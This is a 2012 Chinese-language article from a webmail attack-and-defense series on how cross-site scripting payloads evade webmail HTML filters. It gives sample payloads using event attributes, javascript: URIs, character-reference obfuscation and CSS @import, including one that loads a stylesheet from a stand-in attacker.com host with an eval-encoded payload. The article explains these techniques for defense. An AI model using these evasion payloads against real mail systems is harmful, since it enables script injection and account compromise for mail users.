文章內容

Webmail攻防實戰(4)

發布時間: 2012/8/14 13:51:01

鑒于腳本程序可能帶來的危險，WebMail系統完全有必要禁止html郵件中的腳本程序。禁止腳本程序的基本做法就是過濾掉html源程序中能夠使腳本程序運行的代碼，如script元素等，在這方面做的最好的莫過于hotmail了。下面是些常見的繞過腳本程序過濾的方法，不少的WebMail系統仍然沒有完全改正：

(1)在html語言里，除了script元素內的或在script元素內引入的腳本程序能在html頁面裝載時被運行外，使用事件屬性也能調用腳本程序運行，事件屬性在JavaScript語言里被稱為事件句柄，用于對頁面上的某個特定事件（如鼠標點擊、表單提交）做出響應，驅動javascript程序運行。它的語法如下：

＜tagattribute1attribute2onEventName="javascriptcode；"＞

例如：

以下為引用的內容：
＜bodyonload="alert('JavaScript#1isexecuted')；"＞
＜ahref="#"onclick="alert('JavaScript#2isexecuted')；"＞Clickhere＜/a＞
＜formmethod="post"action="#"onsubmit="alert('JavaScript#3isexecuted')；"＞
＜inputtype="submit"value="Submit"＞
＜/form＞
＜/body＞

　　
(2)URI（UniversalResourceIdentifier：通用資源標識）用于定位Internet上每種可用的資源，如HTML文檔、圖像、聲音等。瀏覽器根據URI的資源類型（URIscheme）調用相應的程序操作該資源，如果把一些元素的URI屬性值的資源類型設為javascript，則能夠調用javascript程序運行。語法如下，注意要用“；”分隔不同的javascript語句：

＜tagattribute="javascript:javascript-code；"＞

例如：

以下為引用的內容：
＜bodybackground="javascript:alert('JavaScript#1isexecuted')；"＞
＜ahref="javascript:alert('JavaScript#2isexecuted')；"＞Clickhere＜/a＞
＜formmethod="post"action="javascript:alert('JavaScript#3isexecuted')；"＞
＜inputtype="submit"value="Submit"＞
＜/form＞
＜imgsrc="javascript:alert('JavaScript#4isexecuted')；"＞
＜/body＞

　　
(3)由于軟硬件或其他原因，一些冷僻或特殊的字符不能輸入或正確顯示在html頁面上，為了解決這個問題，html中可以使用SGML字符參考。字符參考是一種用來指定文檔字符集中任何字符的獨立編碼機制，以“&”開始，以“；”結束。字符參考有兩種表達方式：數字字符參考和實體字符參考。數字字符參考的語法為“&#D；”（D代表一個十進制數），或“&#xH；”、“&#XH；”（H代表一個十六進制數），例如“&#65；”、“&#x41；”表示字母“A”，“&#27700；”、“&#x6C34；”表示漢字“水”。

攻擊者把html語句里的一些字符以數字字符參考來代替，這樣能避開WebMail系統對腳本程序的過濾。需要注意的是，元素和屬性不可以用字符參考表示，例如：

以下為引用的內容：
＜body＞
＜imglowsrc="j&#97；vas&#67；ript:alert('JavaScript#1isexecuted')"＞
＜ahref="&#x6a；av&#x41；s&#67；ript&#x3a；ale&#x72；t('JavaScript#2
&#x69；&#x73executed')"＞Clickher&#x65；＜/a＞
＜formmethod="post"action="javascript:alert('JavaScript#3is
executed')"＞
＜inputtype="&#x53；ubmit"value="Submit"＞
＜/form＞
＜/body＞

　　
(4)樣式表是層疊樣式表單（CSS：CascadingStyleSheet）的簡稱，用于控制、增強或統一網頁上的樣式（如字體、顏色等），它能夠將樣式信息與網頁內容相分離，在html語言的style標簽內可以用@import聲明輸入一個樣式表。但是，如果輸入的資源類型或內容是javascript，InternetExplorer瀏覽器仍然會執行。

以下為引用的內容：
例如：＜styletype="text/css"＞
＜!--
@importurl(javascript:alert('JavaScript#1isexecuted'))；
@importurl(http://www.attacker.com/js.css)；
--＞
＜/style＞

　　
其中http://www.attacker.com/js.css的內容如下所示：

以下為引用的內容：
@importurl(javascript:alert('JavaScript#2isexecuted'))；
@importurl(javascript:eval(String.fromCharCode
(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,
108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)))；

　　
能夠繞過WebMail系統對腳本程序過濾的方法遠不止上面所說的這些，例如曾有人發現把“＜script＞”標簽改成“＜_a＜script＞”和“＜＜script＞”的樣子能繞過yahoo電郵的過濾，這個漏洞yahoo在最近才改正過來。

本文出自：億恩科技【www.23lll.com】

服務器租用/服務器托管中國五強！虛擬主機域名注冊頂級提供商！15年品質保障！--億恩科技[ENKJ.COM]